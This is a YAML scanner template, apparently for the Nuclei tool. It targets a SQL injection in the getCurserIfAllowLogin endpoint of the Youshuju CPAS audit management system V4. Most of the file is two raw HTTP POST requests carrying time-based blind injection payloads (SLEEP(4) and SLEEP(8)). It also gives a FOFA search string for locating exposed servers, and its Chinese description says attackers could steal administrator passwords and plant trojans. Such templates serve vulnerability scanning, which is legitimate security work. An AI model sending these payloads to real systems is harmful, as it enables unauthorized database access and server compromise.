http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
          X-Requested-With: XMLHttpRequest
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
          Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
          Accept: text/plain, */*; q=0.01

          ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(4)))mlQT) AND 'qoYJ'='qoYJ
        - |
          POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
          X-Requested-With: XMLHttpRequest
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
          Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
          Accept: text/plain, */*; q=0.01

          ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(8)))mlQT) AND 'qoYJ'='qoYJ
id: youshuju-CPASV4-getCurserIfAllowLogin-sql
info:
    author: Superhero
    description: |-
        fofa: body="/cpasm4/static/cap/font/iconfont.css"
        友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin 接口存在SQL注入，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/ERJy3_jL9sh-LLsl8ypVQQ?token=668829287&lang=zh_CN
    severity: high
    tags: []
